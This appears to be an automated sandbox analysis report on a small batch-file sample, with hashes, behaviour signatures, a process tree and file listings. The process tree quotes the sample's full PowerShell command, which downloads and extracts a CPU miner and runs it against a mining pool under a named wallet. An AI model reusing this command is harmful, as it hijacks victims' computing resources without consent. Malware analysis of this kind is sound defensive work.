Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1798s -
max time network
1807s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
04/02/2024, 14:57
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-ja
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 9 4264 powershell.exe 14 4264 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1352 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1352 cpuminer-sse2.exe 1352 cpuminer-sse2.exe 1352 cpuminer-sse2.exe 1352 cpuminer-sse2.exe 1352 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4264 powershell.exe 4264 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4264 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 5404 wrote to memory of 4264 5404 cmd.exe 84 PID 5404 wrote to memory of 4264 5404 cmd.exe 84 PID 4264 wrote to memory of 5644 4264 powershell.exe 94 PID 4264 wrote to memory of 5644 4264 powershell.exe 94 PID 5644 wrote to memory of 1352 5644 cmd.exe 95 PID 5644 wrote to memory of 1352 5644 cmd.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:5644 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1352
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
747KB
MD52f4dbc4b001a8b3b4f5a2b51c8807f82
SHA13d8cb69cea63f148cd168175d9c67f88d533ef93
SHA256b1c92ea7e8e7003c3a7d5fb3642424af480f1e13d547e50ebd895bce27ddeea2
SHA512d3a8c8cda4af091e3d533c78761b8eeba52a44af4e54d5f1d1a81f2d21b1afe6b60fdf0312f928f87a7c260fc2b74d285dc73ad0b1c8638d177dc323dd2876a8
-
Filesize
619KB
MD5c0657ea807cfc5664c0a14f3a347f749
SHA1101fa264e4fd62874efe1dccc9ac2ae3874db67e
SHA256f2ab2fef4f52b9ff5ce4ac4606d53603add10ad466c618eca953a28c762f9dee
SHA512a80c681646512ab399aa6d6ea8d48af4b7e94eed07b96f4f02a4948b04cc7c115928340f2972fc8f62e83bff08ccb6166ba79a249b4f7d4afda2c01dfcb8981b
-
Filesize
778KB
MD5d27fbefb8de64e0c1676c7caebf9af64
SHA12cb72b471232992735218b185785fa3c12203bab
SHA2565c69dc359895ffe7a5d9ce4da2d8c7a8e2951bdf03ea6c4febfbf72255ebbbd8
SHA512067b0eb0ef3f73ec38f525af006fb63b33e2de14b9e61e13a5f996bc728bcf154d84c663b2dd3dad5601fffdea804d1ec827ed77256bad1b1db65d96dcb4d97f
-
Filesize
756KB
MD5ded3aaf85f57fb4aa50e4b981629f7fd
SHA100d17829a6106da1210024e5d03f96054ec8a375
SHA256ac55ab0a5425637dbdb88a5a79e56e5bb372b21533e2cb46ada9688621cd6291
SHA512d58d9b9b8cb3ef03087fe9eafa15cefe5548a5a5ca43d61adf81dbb33fb2c1bd0da5a1af4d7aa2a98b11aa2b0564d99920fe54eff505f4fa833cee56c118496a
-
Filesize
671KB
MD53c044d043e5fa2031ad85ccdf8733fcc
SHA186fbc5b5eb651ca5845de78ecbc0eecfb5156bee
SHA256c94c9c81656ca754f7e9c1eb253b2643f2b8f34b3c0fc7b2c6d3152c88639874
SHA512da37bb1d7dcbbbf6e9b1ea451bfe0d037da7e9df120d48f793284bfaa25f88b8b966c2a712bca900b458b30b3740d1fcc886b42c6169158c23e976a7ee196cca
-
Filesize
759KB
MD523da0f5df1d03abf59c64eb98f51f9b8
SHA12ed6770d3c4d0097d686b607509f89eae89585a1
SHA2565eec9910e7fa7d85b78f1a752d7b0e5b9d2ed23e9136f911a9c8e21ecadcc805
SHA512c1973aee63adee335b6e6de3a77dd8d5ae2363ed8b8dc8a32e200a32813493701bda225c433039eab919b6b771295634df9356ed7323f265e03f636b909a0b8c
-
Filesize
618KB
MD59585dbb9aac2ece3cccc33e8b2b4965e
SHA196861b732abaaaa82c3c5e43ccc5483a80ddb701
SHA25637d2ff773a3a8474bb76ae2424f19847a3f6c7e14651ef066ef01c52e99b9c18
SHA51248551dbba12f632176e62bfafe236b64fd9fb1378b9f78d90321d1fdb812ae3a8a25d54db478f0a5176c20fd51d4256f9d1bb9c3ffccadabadbdcf1d235fb84b
-
Filesize
236KB
MD5f96152d945bc2acdd44aba22e2f3178b
SHA15dcab81a0ee401f0d491259be4bbc1db40ecd81e
SHA2566769c7c33b289b16c505cef7bc7fe03e8b7cd8c4eb75e1e4dc98d1fe4021eb07
SHA51288611c06f3e3ca43b4f6c607b8be1ec0c748992257a016c9784e9883ee3471477c5207a07fac53d9876f900f260ff92df2703f7398e7f2b7d9f1452dd2244425
-
Filesize
385KB
MD54cc64ddf36176dce7269358a028591d5
SHA15083168e2ece57fa0f9a8bca0bb699046baeb2b8
SHA2561883cc43e2153833730c5c6eb0e29731c8fbcb552c0eaf03b1d04d3611c899b2
SHA512c6ee8cb18362851ec8f5aa583d30a9a97efca3a94f7c9e3b59cecc1950ecdbdd2683fa34f879f80a5f1d2f1850dfa68453838f825facf336cc1a00f46f83a9f5
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
539KB
MD5cf89527149a942cc898d79fe59079847
SHA15f0938d7c8f73761b44cc918b06e795a1b257c3b
SHA256e17e8d126266406f47546f44571c4eb5034e9068986a8352ee676217281fa64a
SHA512720dbe2cc1466fb7e65f86a0d67bf540d57c8c52519a2c531141b2809d3afaba3dbcedb85d655069a4ab6c4545a1c0c08315a87a43d11fae61e930d7081ed9f8